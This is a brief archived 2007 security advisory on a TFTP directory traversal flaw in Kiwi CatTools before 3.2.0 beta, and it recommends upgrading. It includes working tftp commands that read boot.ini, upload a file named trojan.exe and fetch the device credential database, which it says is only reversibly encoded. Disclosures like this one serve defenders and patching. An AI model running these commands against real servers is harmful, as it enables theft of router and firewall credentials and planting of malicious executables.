TUCoPS :: HP Unsorted T :: c07-2271.htm

TFTP directory traversal in Kiwi CatTools
TFTP directory traversal in Kiwi CatTools
TFTP directory traversal in Kiwi CatTools




	TFTP directory traversal in Kiwi CatTools


Application : Kiwi CatTools prior to 3.2.0 beta
Release Date : 8 February 2007
Author : Nicob 

Product :
========
http://www.kiwisyslog.com/cattools-info.php : 

"Kiwi CatTools is a freeware application that provides automated device
configuration management on routers, switches and firewalls."

A built-in TFTP server exists and a "encrypted device database" contains
IP addresses, logins and passwords for each configured device.

Vunerability :
=============
TFTP directory traversal :

tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe

Note : the device database is only protected by a reversible encoding
and can be remotely accessed with "GET a//..//..//kiwidb-cattools.kdb".

Solution :
=========
Upgrade to version 3.2.0 beta or newer.


Nicob


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986- AOH